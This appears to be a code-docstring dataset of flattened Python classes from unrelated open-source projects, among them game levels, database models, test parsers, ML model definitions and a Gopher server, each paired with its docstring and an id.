class Level_01(Level): <NEW_LINE> <INDENT> def __init__(self, player): <NEW_LINE> <INDENT> numGen = random.randint(1,3) <NEW_LINE> Level.__init__(self, player) <NEW_LINE> self.level_limit = -1000 <NEW_LINE> self.background = pygame.image.load("factory.png").convert() <NEW_LINE> self.background.set_colorkey(WHITE) <NEW_LINE> if numGen == 1: <NEW_LINE> <INDENT> level = [ [50, 50, 2, 600, 450], [50, 50, 1, 700, 450], [300, 100, 4, 500, 500], [50, 50, 1, 450, 550] ] <NEW_LINE> self.levellist = level <NEW_LINE> <DEDENT> elif numGen == 2: <NEW_LINE> <INDENT> level = [[50, 50, 2, 250, 500], [50, 50, 1, 350, 500], [50, 50, 2, 150, 550], [50, 50, 1, 250, 550], [50, 50, 2, 300, 550], [50, 50, 3, 350, 550], [50, 50, 3, 450, 550] ] <NEW_LINE> self.levellist = level <NEW_LINE> <DEDENT> elif numGen == 3: <NEW_LINE> <INDENT> level = [ [50, 50, 2, 600, 450], [100, 300, 4, 650, 400], [50, 50, 1, 250, 550], [50, 50, 1, 350, 550], [50, 50, 1, 450, 550], [100, 300, 5, 500, 500] ] <NEW_LINE> self.levellist = level <NEW_LINE> <DEDENT> for platform in level: <NEW_LINE> <INDENT> block = Platform(platform[0], platform[1], platform[2]) <NEW_LINE> block.rect.x = platform[3] <NEW_LINE> block.rect.y = platform[4] <NEW_LINE> block.player = self.player <NEW_LINE> self.platform_list.add(block) <NEW_LINE> <DEDENT> <DEDENT> def returnlevel(self): <NEW_LINE> <INDENT> return self.levellist | Definition for level 1. | 625990877047854f46340f4f |
class RecentCounter: <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.times = [] <NEW_LINE> <DEDENT> def ping(self, t: int) -> int: <NEW_LINE> <INDENT> self.times.append(t) <NEW_LINE> recent_after = t - 3000 <NEW_LINE> recents = 0 <NEW_LINE> for i in range(len(self.times), 0, -1): <NEW_LINE> <INDENT> if self.times[i - 1] >= recent_after: <NEW_LINE> <INDENT> recents += 1 <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> break <NEW_LINE> <DEDENT> <DEDENT> return recents | My initial attempt worked; however, it failed performance tests for a large number of pings. | 62599087ec188e330fdfa447
class MarionetteUnittestOutputParser(DesktopUnittestOutputParser): <NEW_LINE> <INDENT> bad_gecko_install = re.compile(r'Error installing gecko!') <NEW_LINE> def __init__(self, **kwargs): <NEW_LINE> <INDENT> self.install_gecko_failed = False <NEW_LINE> super(MarionetteUnittestOutputParser, self).__init__(**kwargs) <NEW_LINE> <DEDENT> def parse_single_line(self, line): <NEW_LINE> <INDENT> if self.bad_gecko_install.search(line): <NEW_LINE> <INDENT> self.install_gecko_failed = True <NEW_LINE> <DEDENT> super(MarionetteUnittestOutputParser, self).parse_single_line(line) | A class that extends DesktopUnittestOutputParser such that it can
catch failed gecko installation errors. | 625990873617ad0b5ee07ceb |
class TestItemGiftCertificate(unittest.TestCase): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def tearDown(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def testItemGiftCertificate(self): <NEW_LINE> <INDENT> pass | ItemGiftCertificate unit test stubs | 625990877b180e01f3e49e32 |
class GopherServer: <NEW_LINE> <INDENT> def run(self): <NEW_LINE> <INDENT> server_socket = socket.socket() <NEW_LINE> server_socket.bind(('', 70)) <NEW_LINE> server_socket.listen(5) <NEW_LINE> while True: <NEW_LINE> <INDENT> connection, address = server_socket.accept() <NEW_LINE> requested_selector = connection.recv(1024) <NEW_LINE> response = Menu() <NEW_LINE> response.append(MenuItem( MenuItemType.MESSAGE, "Welcome!")) <NEW_LINE> connection.send(response.__str__().encode("utf-8")) <NEW_LINE> connection.shutdown(socket.SHUT_RDWR) <NEW_LINE> connection.close() | Serves Gopher directories and files. | 62599087283ffb24f3cf543b |
class Business(db.Model): <NEW_LINE> <INDENT> __tablename__ = 'business' <NEW_LINE> id = db.Column( db.Integer, Sequence('bussiness_id_seq', start=1, increment=1), primary_key=True, nullable=False ) <NEW_LINE> name = db.Column( db.String(length=255), nullable=False, unique=True ) <NEW_LINE> domain = db.Column( db.String(), nullable=False ) <NEW_LINE> active = db.Column( db.Boolean(), default=True, server_default=text('true'), nullable=False ) <NEW_LINE> @property <NEW_LINE> def serialize(self): <NEW_LINE> <INDENT> return { 'business_id': self.id, 'business_name': self.name } <NEW_LINE> <DEDENT> def get_business(self): <NEW_LINE> <INDENT> return Business.query.with_entities(Business.id, Business.name). filter_by(active=True).all() <NEW_LINE> <DEDENT> def as_dict(self): <NEW_LINE> <INDENT> data = {} <NEW_LINE> for c in self.__table__.columns: <NEW_LINE> <INDENT> if c.name == 'active' and getattr(self, c.name) is True: <NEW_LINE> <INDENT> data[c.name] = str(1) <NEW_LINE> <DEDENT> elif c.name == 'active' and getattr(self, c.name) is False: <NEW_LINE> <INDENT> data[c.name] = str(0) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> data[c.name] = getattr(self, c.name) <NEW_LINE> <DEDENT> <DEDENT> return data <NEW_LINE> <DEDENT> def serialize_columns(self): <NEW_LINE> <INDENT> meta = [] <NEW_LINE> for c in self.__table__.columns: <NEW_LINE> <INDENT> if c.name != 'id' and c.name != 'active': <NEW_LINE> <INDENT> title = '' <NEW_LINE> if c.name == 'name': <NEW_LINE> <INDENT> title = 'Business name:' <NEW_LINE> <DEDENT> elif c.name == 'domain': <NEW_LINE> <INDENT> title = 'Domain:' <NEW_LINE> <DEDENT> meta.append({ 'field': c.name, 'title': c.name.capitalize(), 'sortable': True, 'editable': { 'type': 'text', 'title': title, 'ajaxOptions': { 'type': 'POST', 'success': 'function (data) { }', 'error': 'function (xhr, status, error) { var err = eval("(" + xhr.responseText + ")"); alert(err.Message); }'}, 'validate': 'function (value) { value = $.trim(value); if (!value) { return \'This field is required\'; } if (!/^\$/.test(value)) { return \'This field needs to start width $.\'} var data = $table.bootstrapTable(\'getData\'), index = $(this).parents(\'tr\').data(\'index\'); console.log(data[index]); return \'\';'}}) <NEW_LINE> <DEDENT> elif c.name == 'active': <NEW_LINE> <INDENT> meta.append({'field': c.name, 'title': c.name.capitalize(), 'sortable': True, 'editable': {'type': 'select', 'title': 'Active:', 'source': '[{value: "1", text: "Yes"}, {value: "0", text: "No"}]', 'ajaxOptions': { 'type': 'POST', 'success': 'function (data) { }', 'error': 'function (xhr, status, error) { var err = eval("(" + xhr.responseText + ")"); alert(err.Message); }'}}}) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> meta.append({'field': c.name, 'title': c.name.capitalize(), 'sortable': True}) <NEW_LINE> <DEDENT> <DEDENT> return meta | Business table | 62599087656771135c48adfe |
class Assign(stmt): <NEW_LINE> <INDENT> def init(self, targets, value): <NEW_LINE> <INDENT> assert_exprs(targets, 'targets') <NEW_LINE> assert_expr(value, 'value') <NEW_LINE> self.targets = targets <NEW_LINE> self.value = value | An assignment. Inherits stmt.
targets : a list of expr nodes
value : an expr node | 625990873617ad0b5ee07ced |
class TuningRunManager(tuningrunmain.TuningRunMain): <NEW_LINE> <INDENT> def __init__(self, measurement_interface, args, **kwargs): <NEW_LINE> <INDENT> super(TuningRunManager, self).__init__(measurement_interface, args, **kwargs) <NEW_LINE> self.init() <NEW_LINE> self.tuning_run.state = 'RUNNING' <NEW_LINE> self.commit(force=True) <NEW_LINE> self.search_driver.external_main_begin() <NEW_LINE> <DEDENT> def get_next_desired_result(self): <NEW_LINE> <INDENT> dr = self.measurement_driver.query_pending_desired_results().first() <NEW_LINE> if dr is None: <NEW_LINE> <INDENT> self.search_driver.external_main_generation() <NEW_LINE> dr = self.measurement_driver.query_pending_desired_results().first() <NEW_LINE> if dr is None: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> self.measurement_driver.claim_desired_result(dr) <NEW_LINE> dr.limit = self.measurement_driver.run_time_limit(dr) <NEW_LINE> return dr <NEW_LINE> <DEDENT> def get_desired_results(self): <NEW_LINE> <INDENT> drs = self.measurement_driver.query_pending_desired_results().all() <NEW_LINE> if len(drs) == 0: <NEW_LINE> <INDENT> self.search_driver.external_main_generation() <NEW_LINE> drs = self.measurement_driver.query_pending_desired_results().all() <NEW_LINE> if len(drs) == 0: <NEW_LINE> <INDENT> return [] <NEW_LINE> <DEDENT> <DEDENT> for dr in drs: <NEW_LINE> <INDENT> self.measurement_driver.claim_desired_result(dr) <NEW_LINE> dr.limit = self.measurement_driver.run_time_limit(dr) <NEW_LINE> <DEDENT> return drs <NEW_LINE> <DEDENT> def report_result(self, desired_result, result, result_input=None): <NEW_LINE> <INDENT> self.measurement_driver.report_result(desired_result, result, result_input) <NEW_LINE> <DEDENT> def get_best_configuration(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self.search_driver.best_result.configuration.data <NEW_LINE> <DEDENT> except AttributeError: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> def get_best_result(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self.search_driver.best_result <NEW_LINE> <DEDENT> except AttributeError: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> def finish(self): <NEW_LINE> <INDENT> self.search_driver.external_main_end() <NEW_LINE> self.measurement_interface.save_final_config( self.search_driver.best_result.configuration) <NEW_LINE> self.tuning_run.final_config = self.search_driver.best_result.configuration <NEW_LINE> self.tuning_run.state = 'COMPLETE' <NEW_LINE> self.tuning_run.end_date = datetime.now() <NEW_LINE> self.commit(force=True) <NEW_LINE> self.session.close() | This class manages a tuning run in a "slave" configuration, where main()
is controlled by another program. | 62599087091ae356687067df
class Tracker(object): <NEW_LINE> <INDENT> NOT_IMPLEMENTED_MSG = 'To be implemented in device-linked class' <NEW_LINE> def __init__(self): <NEW_LINE> <INDENT> self.__connected = False <NEW_LINE> <DEDENT> def connect(self): <NEW_LINE> <INDENT> raise NotImplementedError(Tracker.NOT_IMPLEMENTED_MSG) <NEW_LINE> <DEDENT> def disconnect(self): <NEW_LINE> <INDENT> raise NotImplementedError(Tracker.NOT_IMPLEMENTED_MSG) <NEW_LINE> <DEDENT> @property <NEW_LINE> def connected(self): <NEW_LINE> <INDENT> return self.__connected <NEW_LINE> <DEDENT> @connected.setter <NEW_LINE> def connected(self, connected): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def capture(self, tool_id): <NEW_LINE> <INDENT> raise NotImplementedError(Tracker.NOT_IMPLEMENTED_MSG) | This class is an abstraction for all supported trackers. | 62599087283ffb24f3cf543e |
class DjangoModelDereferenceMixin(object): <NEW_LINE> <INDENT> def __get__(self, instance, owner): <NEW_LINE> <INDENT> if instance is None: <NEW_LINE> <INDENT> return self <NEW_LINE> <DEDENT> dereference = DjangoModelDereference() <NEW_LINE> if instance._initialised and instance._data.get(self.name): <NEW_LINE> <INDENT> instance._data[self.name] = dereference( instance._data.get(self.name), max_depth=1, instance=instance, name=self.name ) <NEW_LINE> <DEDENT> value = super(DjangoModelDereferenceMixin, self).__get__(instance, owner) <NEW_LINE> return self.to_python(value) | Mixin class which overrides __get__ behaviour for ModelFields
so it returns Model instances if possible. | 62599087656771135c48adff |
class CoordinationDriverCachedRunWatchers(CoordinationDriver): <NEW_LINE> <INDENT> def __init__(self, member_id, parsed_url, options): <NEW_LINE> <INDENT> super(CoordinationDriverCachedRunWatchers, self).__init__( member_id, parsed_url, options) <NEW_LINE> self._group_members = collections.defaultdict(set) <NEW_LINE> self._joined_groups = set() <NEW_LINE> <DEDENT> def _init_watch_group(self, group_id): <NEW_LINE> <INDENT> if group_id not in self._group_members: <NEW_LINE> <INDENT> members = self.get_members(group_id) <NEW_LINE> self._group_members[group_id] = members.get() <NEW_LINE> <DEDENT> <DEDENT> def watch_join_group(self, group_id, callback): <NEW_LINE> <INDENT> self._init_watch_group(group_id) <NEW_LINE> super(CoordinationDriverCachedRunWatchers, self).watch_join_group( group_id, callback) <NEW_LINE> <DEDENT> def unwatch_join_group(self, group_id, callback): <NEW_LINE> <INDENT> super(CoordinationDriverCachedRunWatchers, self).unwatch_join_group( group_id, callback) <NEW_LINE> if (not self._has_hooks_for_group(group_id) and group_id in self._group_members): <NEW_LINE> <INDENT> del self._group_members[group_id] <NEW_LINE> <DEDENT> <DEDENT> def watch_leave_group(self, group_id, callback): <NEW_LINE> <INDENT> self._init_watch_group(group_id) <NEW_LINE> super(CoordinationDriverCachedRunWatchers, self).watch_leave_group( group_id, callback) <NEW_LINE> <DEDENT> def unwatch_leave_group(self, group_id, callback): <NEW_LINE> <INDENT> super(CoordinationDriverCachedRunWatchers, self).unwatch_leave_group( group_id, callback) <NEW_LINE> if (not self._has_hooks_for_group(group_id) and group_id in self._group_members): <NEW_LINE> <INDENT> del self._group_members[group_id] <NEW_LINE> <DEDENT> <DEDENT> def run_watchers(self, timeout=None): <NEW_LINE> <INDENT> with timeutils.StopWatch(duration=timeout) as w: <NEW_LINE> <INDENT> result = [] <NEW_LINE> group_with_hooks = set(self._hooks_join_group.keys()).union( set(self._hooks_leave_group.keys())) <NEW_LINE> for group_id in group_with_hooks: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> group_members = self.get_members(group_id).get( timeout=w.leftover(return_none=True)) <NEW_LINE> <DEDENT> except GroupNotCreated: <NEW_LINE> <INDENT> group_members = set() <NEW_LINE> <DEDENT> if (group_id in self._joined_groups and self._member_id not in group_members): <NEW_LINE> <INDENT> self._joined_groups.discard(group_id) <NEW_LINE> <DEDENT> old_group_members = self._group_members.get(group_id, set()) <NEW_LINE> for member_id in (group_members - old_group_members): <NEW_LINE> <INDENT> result.extend( self._hooks_join_group[group_id].run( MemberJoinedGroup(group_id, member_id))) <NEW_LINE> <DEDENT> for member_id in (old_group_members - group_members): <NEW_LINE> <INDENT> result.extend( self._hooks_leave_group[group_id].run( MemberLeftGroup(group_id, member_id))) <NEW_LINE> <DEDENT> self._group_members[group_id] = group_members <NEW_LINE> <DEDENT> return result | Coordination driver with a `run_watchers` implementation.
This implementation of `run_watchers` is based on a cache of the group
members between each run of `run_watchers` that is being updated between
each run. | 625990877047854f46340f53 |
class ResNetCifar10(model_base.ResNet): <NEW_LINE> <INDENT> def __init__(self, num_layers, is_training, batch_norm_decay, batch_norm_epsilon, data_format='channels_first'): <NEW_LINE> <INDENT> super(ResNetCifar10, self).__init__( is_training, data_format, batch_norm_decay, batch_norm_epsilon ) <NEW_LINE> self.n = (num_layers - 2) // 6 <NEW_LINE> self.num_classes = 10 + 1 <NEW_LINE> self.filters = [16, 16, 32, 64] <NEW_LINE> self.strides = [1, 2, 2] <NEW_LINE> <DEDENT> def forward_pass(self, x, input_data_format='channels_last'): <NEW_LINE> <INDENT> if self._data_format != input_data_format: <NEW_LINE> <INDENT> if input_data_format == 'channels_last': <NEW_LINE> <INDENT> x = tf.transpose(x, [0, 3, 1, 2]) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> x = tf.transpose(x, [0, 2, 3, 1]) <NEW_LINE> <DEDENT> <DEDENT> x = x / 128 - 1 <NEW_LINE> x = self._conv(x, 3, 16, 1) <NEW_LINE> x = self._batch_norm(x) <NEW_LINE> x = self._relu(x) <NEW_LINE> res_func = self._residual_v1 <NEW_LINE> for i in range(3): <NEW_LINE> <INDENT> with tf.name_scope('stage'): <NEW_LINE> <INDENT> for j in range(self.n): <NEW_LINE> <INDENT> if j == 0: <NEW_LINE> <INDENT> x = res_func(x, 3, self.filters[i], self.filters[i + 1], self.strides[i]) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> x = res_func(x, 3, self.filters[i + 1], self.filters[i + 1], 1) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> <DEDENT> x = self._global_avg_pool(x) <NEW_LINE> x = self._fully_connected_with_activation(x, self.num_classes) <NEW_LINE> return x | Cifar10 model with ResNetV1 and basic residual block. | 625990875fdd1c0f98e5fb18 |
class RData( Binary ): <NEW_LINE> <INDENT> file_ext = 'rdata' <NEW_LINE> def sniff( self, filename ): <NEW_LINE> <INDENT> rdata_header = b'RDX2\nX\n' <NEW_LINE> try: <NEW_LINE> <INDENT> header = open(filename, 'rb').read(7) <NEW_LINE> if header == rdata_header: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> header = gzip.open( filename ).read(7) <NEW_LINE> if header == rdata_header: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> <DEDENT> except: <NEW_LINE> <INDENT> return False | Generic R Data file datatype implementation | 6259908771ff763f4b5e934c |
class FunctionCache: <NEW_LINE> <INDENT> __slots__ = [ "_primary", "_dispatch_table", "_garbage_collectors" ] <NEW_LINE> def __init__(self): <NEW_LINE> <INDENT> self._primary = collections.OrderedDict() <NEW_LINE> self._dispatch_table = type_dispatch.TypeDispatchTable() <NEW_LINE> self._garbage_collectors = [ _FunctionGarbageCollector(self._primary), ] <NEW_LINE> <DEDENT> def lookup(self, key: FunctionCacheKey, use_function_subtyping: bool): <NEW_LINE> <INDENT> if not use_function_subtyping: <NEW_LINE> <INDENT> return self._primary.get(key, None) <NEW_LINE> <DEDENT> dispatch_key = self._dispatch_table.dispatch(key) <NEW_LINE> if dispatch_key is not None: <NEW_LINE> <INDENT> return self._primary[dispatch_key] <NEW_LINE> <DEDENT> return None <NEW_LINE> <DEDENT> def delete(self, key: FunctionCacheKey): <NEW_LINE> <INDENT> if key not in self._primary: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> del self._primary[key] <NEW_LINE> self._dispatch_table.delete(key) <NEW_LINE> return True <NEW_LINE> <DEDENT> def add(self, key: FunctionCacheKey, deletion_observer: trace_type.WeakrefDeletionObserver, concrete): <NEW_LINE> <INDENT> self._primary[key] = concrete <NEW_LINE> self._dispatch_table.add_target(key) <NEW_LINE> deletion_observer.add_listener( lambda: self.delete(key) if DELETE_WITH_WEAKREF else None) <NEW_LINE> <DEDENT> def generalize(self, key: FunctionCacheKey) -> FunctionCacheKey: <NEW_LINE> <INDENT> return self._dispatch_table.try_generalizing_trace_type(key) <NEW_LINE> <DEDENT> def clear(self): <NEW_LINE> <INDENT> self._primary.clear() <NEW_LINE> self._dispatch_table.clear() <NEW_LINE> <DEDENT> def values(self): <NEW_LINE> <INDENT> return list(self._primary.values()) | A container for managing concrete functions. | 6259908723849d37ff852c59 |
@INDEX.doc_type <NEW_LINE> class ExerciseDocument(Document): <NEW_LINE> <INDENT> id = fields.IntegerField(attr='id') <NEW_LINE> exercise_title = fields.TextField( attr='exercise_title', analyzer=html_strip, fields={ 'raw': fields.TextField(analyzer='keyword', multi=True), 'suggest': fields.CompletionField(multi=True), }, ) <NEW_LINE> muscle_group_title = fields.TextField( attr='muscle_group_indexing', analyzer=html_strip, fields={ 'raw': fields.TextField(analyzer='keyword', multi=True), 'suggest': fields.CompletionField(multi=True), }, multi=True, ) <NEW_LINE> class Django(object): <NEW_LINE> <INDENT> model = Exercise | Book Elasticsearch document. | 62599087f9cc0f698b1c609b |
class Command(BaseCommand): <NEW_LINE> <INDENT> help = 'This command imports fixed spellings for lexemes in the database.' 'The format that is expected "lang;correct_spelling;POS;ID;misspelled_word;POS"' <NEW_LINE> def add_arguments(self, parser): <NEW_LINE> <INDENT> parser.add_argument('-f', '--file', type=str, help='The CSV file to import.', ) <NEW_LINE> parser.add_argument('-d', '--delimiter', type=str, nargs='?', default=';', help='The delimiter to use when reading the CSV file.', ) <NEW_LINE> <DEDENT> def handle(self, *args, **options): <NEW_LINE> <INDENT> file_path = options['file'] <NEW_LINE> d = options['delimiter'] <NEW_LINE> if not os.path.isfile(file_path): <NEW_LINE> <INDENT> raise CommandError('File "%s" does not exist.' % file_path) <NEW_LINE> <DEDENT> with io.open(file_path, 'r', encoding='utf-8') as fp: <NEW_LINE> <INDENT> reader = csv.reader(fp, delimiter=d) <NEW_LINE> rows = list(reader) <NEW_LINE> rows = [r for r in rows if len(r) > 0] <NEW_LINE> for r in rows: <NEW_LINE> <INDENT> process(r) <NEW_LINE> <DEDENT> <DEDENT> self.stdout.write(self.style.SUCCESS('Successfully processed the file "%s"' % (file_path,))) | Example: python manage.py fix_spellings -f ../data/Adj-workspace_2020-05-19b.csv -d ';' | 62599087e1aae11d1e7cf5e3 |
class Autoshare(Entity): <NEW_LINE> <INDENT> __entityName__ = "security-policy" <NEW_LINE> __isLegacy__ = True <NEW_LINE> def edit( self, experiment_sharing=UNSPECIFIED, protocol_sharing=UNSPECIFIED, resource_sharing=UNSPECIFIED, extraParams={}, ): <NEW_LINE> <INDENT> from labstep.generic.entity.repository import editEntity <NEW_LINE> options = {True: "edit", False: "none", UNSPECIFIED: UNSPECIFIED} <NEW_LINE> fields = { "experiment_workflow": options[experiment_sharing], "protocol_collection": options[protocol_sharing], "resource": options[resource_sharing], **extraParams, } <NEW_LINE> return editEntity(self, fields=fields) | Represents an Autosharing rule on Labstep. | 625990878a349b6b43687dfe |
class matchesPattern(Validator): <NEW_LINE> <INDENT> def __init__(self, pattern): <NEW_LINE> <INDENT> self._pattern = re.compile(pattern) <NEW_LINE> <DEDENT> def test(self,x): <NEW_LINE> <INDENT> x = str(x) <NEW_LINE> print('testing %s against %s' % (x, self._pattern)) <NEW_LINE> return (self._pattern.match(x) != None) | Matches value, or its string representation, against regex | 625990874a966d76dd5f0a86 |
class AmuletDeployment(object): <NEW_LINE> <INDENT> def __init__(self, series=None): <NEW_LINE> <INDENT> self.series = None <NEW_LINE> if series: <NEW_LINE> <INDENT> self.series = series <NEW_LINE> self.d = amulet.Deployment(series=self.series) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.d = amulet.Deployment() <NEW_LINE> <DEDENT> <DEDENT> def _add_services(self, this_service, other_services): <NEW_LINE> <INDENT> name, units = range(2) <NEW_LINE> if this_service[name] != os.path.basename(os.getcwd()): <NEW_LINE> <INDENT> s = this_service[name] <NEW_LINE> msg = "The charm's root directory name needs to be {}".format(s) <NEW_LINE> amulet.raise_status(amulet.FAIL, msg=msg) <NEW_LINE> <DEDENT> self.d.add(this_service[name], units=this_service[units]) <NEW_LINE> for svc in other_services: <NEW_LINE> <INDENT> if self.series: <NEW_LINE> <INDENT> self.d.add(svc[name], charm='cs:{}/{}'.format(self.series, svc[name]), units=svc[units]) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.d.add(svc[name], units=svc[units]) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def _add_relations(self, relations): <NEW_LINE> <INDENT> for k, v in relations.iteritems(): <NEW_LINE> <INDENT> self.d.relate(k, v) <NEW_LINE> <DEDENT> <DEDENT> def _configure_services(self, configs): <NEW_LINE> <INDENT> for service, config in configs.iteritems(): <NEW_LINE> <INDENT> self.d.configure(service, config) <NEW_LINE> <DEDENT> <DEDENT> def _deploy(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> self.d.setup() <NEW_LINE> self.d.sentry.wait(timeout=900) <NEW_LINE> <DEDENT> except amulet.helpers.TimeoutError: <NEW_LINE> <INDENT> amulet.raise_status(amulet.FAIL, msg="Deployment timed out") <NEW_LINE> <DEDENT> except Exception: <NEW_LINE> <INDENT> raise <NEW_LINE> <DEDENT> <DEDENT> def run_tests(self): <NEW_LINE> <INDENT> for test in dir(self): <NEW_LINE> <INDENT> if test.startswith('test_'): <NEW_LINE> <INDENT> getattr(self, test)() | Amulet deployment.
This class provides generic Amulet deployment and test runner
methods. | 6259908755399d3f056280b5 |
class RconPacketException(Exception): <NEW_LINE> <INDENT> pass | Rcon Packet Exception | 62599087a05bb46b3848bef7 |
class itkDicomImageIO(itkGDCMImageIO): <NEW_LINE> <INDENT> thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') <NEW_LINE> def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined") <NEW_LINE> __repr__ = _swig_repr <NEW_LINE> def __New_orig__(): <NEW_LINE> <INDENT> return _ITKIOBasePython.itkDicomImageIO___New_orig__() <NEW_LINE> <DEDENT> __New_orig__ = staticmethod(__New_orig__) <NEW_LINE> __swig_destroy__ = _ITKIOBasePython.delete_itkDicomImageIO <NEW_LINE> def cast(*args): <NEW_LINE> <INDENT> return _ITKIOBasePython.itkDicomImageIO_cast(*args) <NEW_LINE> <DEDENT> cast = staticmethod(cast) <NEW_LINE> def GetPointer(self): <NEW_LINE> <INDENT> return _ITKIOBasePython.itkDicomImageIO_GetPointer(self) <NEW_LINE> <DEDENT> def New(*args, **kargs): <NEW_LINE> <INDENT> obj = itkDicomImageIO.__New_orig__() <NEW_LINE> import itkTemplate <NEW_LINE> itkTemplate.New(obj, *args, **kargs) <NEW_LINE> return obj <NEW_LINE> <DEDENT> New = staticmethod(New) | Proxy of C++ itkDicomImageIO class | 62599087283ffb24f3cf5441 |
class ProgramGroupBonus(Model): <NEW_LINE> <INDENT> COLUMNS = { "id": ColumnInteger(autoincrement=True, primary_key=True), "amount_minutes": ColumnInteger(null=False), "created": ColumnDatetime(null=False), "creator": ColumnText(null=False), "effective_date": ColumnDate(null=False), "message": ColumnText(null=False), "program_group": ColumnForeignKey(ProgramGroup), } | Bonus time for a program group. | 625990874527f215b58eb770 |
class SkillProxy(EveItemWrapper): <NEW_LINE> <INDENT> def __init__(self, type_id, level): <NEW_LINE> <INDENT> EveItemWrapper.__init__(self, type_id) <NEW_LINE> self.__parent_char_proxy = None <NEW_LINE> self.__eos_skill = EosSkill(type_id, level=level) <NEW_LINE> <DEDENT> @property <NEW_LINE> def _source(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self._parent_char_proxy._parent_fit.source <NEW_LINE> <DEDENT> except AttributeError: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> @property <NEW_LINE> def _eos_item(self): <NEW_LINE> <INDENT> return self.__eos_skill <NEW_LINE> <DEDENT> @property <NEW_LINE> def level(self): <NEW_LINE> <INDENT> return self.__eos_skill.level <NEW_LINE> <DEDENT> def _set_level(self, new_level): <NEW_LINE> <INDENT> self.__eos_skill.level = new_level <NEW_LINE> <DEDENT> @property <NEW_LINE> def _parent_char_proxy(self): <NEW_LINE> <INDENT> return self.__parent_char_proxy <NEW_LINE> <DEDENT> @_parent_char_proxy.setter <NEW_LINE> def _parent_char_proxy(self, new_char_proxy): <NEW_LINE> <INDENT> old_char_proxy = self._parent_char_proxy <NEW_LINE> old_fit = getattr(old_char_proxy, '_parent_fit', None) <NEW_LINE> new_fit = getattr(new_char_proxy, '_parent_fit', None) <NEW_LINE> self._unregister_on_fit(old_fit) <NEW_LINE> self.__parent_char_proxy = new_char_proxy <NEW_LINE> self._register_on_fit(new_fit) <NEW_LINE> self._update_source() <NEW_LINE> <DEDENT> def _register_on_fit(self, fit): <NEW_LINE> <INDENT> if fit is not None: <NEW_LINE> <INDENT> fit._eos_fit.skills.add(self.__eos_skill) <NEW_LINE> <DEDENT> <DEDENT> def _unregister_on_fit(self, fit): <NEW_LINE> <INDENT> if fit is not None: <NEW_LINE> <INDENT> fit._eos_fit.skills.remove(self.__eos_skill) <NEW_LINE> <DEDENT> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> spec = ['eve_id', 'level'] <NEW_LINE> return make_repr_str(self, spec) | Pyfa model: character_proxy.RestrictedSet(skills)
Eos model: efit.RestrictedSet(skills)
DB model: none (SkillCore handles it) | 625990875fc7496912d4903b |
class TermsAndAgreements(BrowserView): <NEW_LINE> <INDENT> pass | Terms-and-agreements View
| 62599087091ae356687067e3 |
class RNN(vae_module.VAECore): <NEW_LINE> <INDENT> def __init__(self, hparams, obs_encoder, obs_decoder, name=None): <NEW_LINE> <INDENT> super(RNN, self).__init__(hparams, obs_encoder, obs_decoder, name) <NEW_LINE> with self._enter_variable_scope(): <NEW_LINE> <INDENT> self._d_core = util.make_rnn(hparams, name="d_core") <NEW_LINE> <DEDENT> <DEDENT> @property <NEW_LINE> def state_size(self): <NEW_LINE> <INDENT> return self._d_core.state_size <NEW_LINE> <DEDENT> def _next_state(self, d_state, event=None): <NEW_LINE> <INDENT> del event <NEW_LINE> return d_state <NEW_LINE> <DEDENT> def _initial_state(self, batch_size): <NEW_LINE> <INDENT> return self._d_core.initial_state(batch_size) <NEW_LINE> <DEDENT> def _build(self, input_, d_state): <NEW_LINE> <INDENT> d_out, d_state = self._d_core(util.concat_features(input_), d_state) <NEW_LINE> return self._obs_decoder(d_out), d_state <NEW_LINE> <DEDENT> def _infer_latents(self, inputs, observed): <NEW_LINE> <INDENT> del inputs <NEW_LINE> batch_size = util.batch_size_from_nested_tensors(observed) <NEW_LINE> sequence_size = util.sequence_size_from_nested_tensors(observed) <NEW_LINE> divs = tf.zeros([batch_size, sequence_size], name="divergences") <NEW_LINE> return None, divs | Implementation of an RNN as a sequential VAE where all latent
variables are deterministic. | 62599087f9cc0f698b1c609c |
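Because `_infer_latents` returns an all-zero divergence tensor, the sequence ELBO collapses to the reconstruction log-likelihood. A minimal plain-Python sketch of that bookkeeping (hypothetical numbers, no TensorFlow):

    recon_log_probs = [-1.2, -0.8, -1.5]           # hypothetical per-step log p(x_t | d_t)
    divergences = [0.0] * len(recon_log_probs)     # mirrors tf.zeros(...) in _infer_latents
    elbo = sum(r - d for r, d in zip(recon_log_probs, divergences))
    print(elbo)                                    # -3.5, i.e. the plain RNN log-likelihood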
